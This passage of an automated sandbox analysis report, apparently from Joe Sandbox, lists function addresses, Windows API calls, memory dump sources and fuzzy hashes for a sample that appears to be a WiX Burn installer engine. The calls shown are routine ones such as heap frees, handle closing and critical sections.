                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to parse command line.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3861434553-3869882359
                                                                                                                                                                                                                                                                            • Opcode ID: 52eb869c0bfb55e67a92fcdc4af5c522028ee9fc091bedfdea3f03fdd14d9219
                                                                                                                                                                                                                                                                            • Instruction ID: 13e78a2d578ee1b16b52ad07e7654cd81d5c80df62a0cd27ac5adb187d42dee6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52eb869c0bfb55e67a92fcdc4af5c522028ee9fc091bedfdea3f03fdd14d9219
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C94171309056A9D6DF34B7A5CC06BAD72B8FF42305F0840A5A548E20C2DF748EC8CF92
                                                                                                                                                                                                                                                                            Function 008E55C9 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,0090DE2B,?), ref: 008E55D3
                                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,0090DE2B,?), ref: 008E55DA
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0090DE2B,?), ref: 008E55E4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 406640338-0
                                                                                                                                                                                                                                                                            • Opcode ID: fac45c8e5f506ba0d472553b5e93aa4f287ee1940707de9553de2b59dc409056
                                                                                                                                                                                                                                                                            • Instruction ID: 14fc04f79974d76640d7fa528cbfff2ef35e2eab6ac3303f2866f576d01dd216
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fac45c8e5f506ba0d472553b5e93aa4f287ee1940707de9553de2b59dc409056
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABD0C277909935A3C22017EAAC08D4BBE6DFF026A17014621FD04D7110C661CC00A2E0
                                                                                                                                                                                                                                                                            Function 0092E644 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(0092E74E,?,0092E63E,00000000,?,?,0092E74E,D7B140E6,?,0092E74E), ref: 0092E655
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0092E63E,00000000,?,?,0092E74E,D7B140E6,?,0092E74E), ref: 0092E65C
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0092E66E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7f805f2ab5e122cd8f06b4f98b5a4801a22c2fe78a10ad07da87df707b9027f8
                                                                                                                                                                                                                                                                            • Instruction ID: d6f4ef05855355300014dcb7e988110c4505c95f1bff1bfdc9d831d723af9ea2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f805f2ab5e122cd8f06b4f98b5a4801a22c2fe78a10ad07da87df707b9027f8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6D09235018118BFDF052FA0EC4DE993F2AFF96345B408150B9194A175DF759D92EB84
                                                                                                                                                                                                                                                                            Function 008E7E72 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008E80F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to run per-user mode., xrefs: 008E7E78
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to run per-user mode.
                                                                                                                                                                                                                                                                            • API String ID: 3861434553-1208236218
                                                                                                                                                                                                                                                                            • Opcode ID: 267b12a476aebf612a467094bff13b0e92f1ee69d43c20fd5005ce12e9707ee0
                                                                                                                                                                                                                                                                            • Instruction ID: 64fdfd4660b040cacf9d4cb5f666b06d4e00a360b71fae1d45b1371dd88e9469
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 267b12a476aebf612a467094bff13b0e92f1ee69d43c20fd5005ce12e9707ee0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E44180719056A9D6DB34ABA5CC06BAD73B8FF01305F1840A6A548E2182DF749E84CF92
                                                                                                                                                                                                                                                                            Function 0093AC32 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(FFFFFFFF,?,0093B428,00000000,00000000,?,008E8106), ref: 0093AC55
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                            • String ID: .Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2962429428-727612987
                                                                                                                                                                                                                                                                            • Opcode ID: d8dc57ef52d5765ed983c85dcfbd6f5e67fd11db3a1c502c4716aa7531a10be3
                                                                                                                                                                                                                                                                            • Instruction ID: 7ceaa3f6478707e0ed5d1128e6b453ccb323e4aa7df5344c05d0d2e77cc9740e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8dc57ef52d5765ed983c85dcfbd6f5e67fd11db3a1c502c4716aa7531a10be3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52F05EB26242046BD624DB79DD8DB1533ADAB61721F181304A0A8C71F0D734EC84AE13
                                                                                                                                                                                                                                                                            Function 0090DDD0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(000000FF,?,?), ref: 0090DE0C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                            • String ID: .Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2962429428-727612987
                                                                                                                                                                                                                                                                            • Opcode ID: 5b5cc3d11692ce920e8d65d390cc8694a51b25856723d7950327144316c3efa9
                                                                                                                                                                                                                                                                            • Instruction ID: b68842134ec953cfb78bd246bd8156eb2bcf7f1ea4f9ea337b71c73acb70242f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b5cc3d11692ce920e8d65d390cc8694a51b25856723d7950327144316c3efa9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B2F06D35110204DFDB119FA8C849F553BE8FF14375F458258E9198B2F2C734D850DB50
                                                                                                                                                                                                                                                                            Function 0093B3F2 Relevance: 2.5, APIs: 2, Instructions: 17COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0097D4F0,00000000,00000000,?,0093A9A3,?,?,?,00000000,0000FDE9,?,008E7B05,00000003), ref: 0093B3FD
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0097D4F0,?,?,0093A9A3,?,?,?,00000000,0000FDE9,?,008E7B05,00000003), ref: 0093B40E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                            • Opcode ID: 939abdec3c4e3d76c57f08bb8df5497ef1dc50b2fcefdd0bbe02779f4af06c6f
                                                                                                                                                                                                                                                                            • Instruction ID: 161196e9b25653b8be74163cbb130c9439a460f82b27b812bed7082b3bd5ebf2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 939abdec3c4e3d76c57f08bb8df5497ef1dc50b2fcefdd0bbe02779f4af06c6f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CD0C733604114678610279AFC08D9AFAEDDED66B17044036F504D213096B1E81196A5
                                                                                                                                                                                                                                                                            Function 0093C287 Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(?,?,0093D0F5,00000000,00000000,?,?,00000000,00000003,00000000,00000000,?,?,?,0093CDF4,00000000), ref: 0093C2F7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3660427363-0
                                                                                                                                                                                                                                                                            • Opcode ID: af50138888c758efb435cf996be20e217b14d5d58de79faf20f54ec4da3615ce
                                                                                                                                                                                                                                                                            • Instruction ID: 1d53336dd73963c0f7ea5dad51f919cd1ec50055d9569ec398860caca44e78e8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af50138888c758efb435cf996be20e217b14d5d58de79faf20f54ec4da3615ce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921B171B1062AEBDB158F55CC00A6E7BBAFF85700F24C066E905AB224D731ED02EF90
                                                                                                                                                                                                                                                                            Function 0093B41C Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093AC32: CloseHandle.KERNELBASE(FFFFFFFF,?,0093B428,00000000,00000000,?,008E8106), ref: 0093AC55
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(0097D4F0,00000000,00000000,?,008E8106,00000000,?,?,?,?), ref: 0093B437
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCriticalDeleteHandleSection
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1370521891-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8ae7459815ad70e5796b7885eeee6e20eaa3ae22b7b410ce7374c783098a5aee
                                                                                                                                                                                                                                                                            • Instruction ID: 8683555650034613817f7c677b0228867c71f348b9e081fae35fb1f0ad8aa2f3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ae7459815ad70e5796b7885eeee6e20eaa3ae22b7b410ce7374c783098a5aee
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3F012B2626214ABC610EF79EC09D157BBDFE15B847008016B908D7275D771DA90EFE1
                                                                                                                                                                                                                                                                            Function 0094C44D Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C4F6: RtlAcquireSRWLockExclusive.NTDLL ref: 0094C513
                                                                                                                                                                                                                                                                            • DloadProtectSection.DELAYIMP ref: 0094C475
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AcquireDloadExclusiveLockProtectSection
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3680172570-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3638ba2155ded05d4d31254b3bc84dcf8fed7ba35655d35b99ce8527613d78bb
                                                                                                                                                                                                                                                                            • Instruction ID: 1f90ac499caf063a805f0cb3318c3264dad7eeee683be3a71329ee39e53aa7fa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3638ba2155ded05d4d31254b3bc84dcf8fed7ba35655d35b99ce8527613d78bb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42D022F20171008ED2E9AB388EA2FA432F0FBC432BF004814B28AA60B1CF6000C0A212
                                                                                                                                                                                                                                                                            Function 0094C19C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C183
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5f21562ee4032c498567869864ea06fbe377f45f7d2a1a397c2983fabde36ce8
                                                                                                                                                                                                                                                                            • Instruction ID: 63b406335d57672f0cf13b8a6f4d36ab9a56dc87d738d00256f4ae256c3c7269
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f21562ee4032c498567869864ea06fbe377f45f7d2a1a397c2983fabde36ce8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9AB012C325F1026E319451049D03E3E114CC4CAB10330E41FB408C4042E4854C011033
                                                                                                                                                                                                                                                                            Function 0094C18C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C183
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1f5b1061d501c920ab40a1bdefcf2764bda8e67ed1f32d83822e3f9bbd7bb850
                                                                                                                                                                                                                                                                            • Instruction ID: cfcbae63cc903e2422a29ac451b1f6ea4e4b739aba0965efe259c42121475f63
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f5b1061d501c920ab40a1bdefcf2764bda8e67ed1f32d83822e3f9bbd7bb850
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47B012C325F1026E319451045C03F3E114CD4CAB14330EC1FB408C4082D4844C001033
                                                                                                                                                                                                                                                                            Function 0094C1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: e356bb6153bf24294620575b673bbb129a7689a35b13e170a83d8cbac4b0cb8e
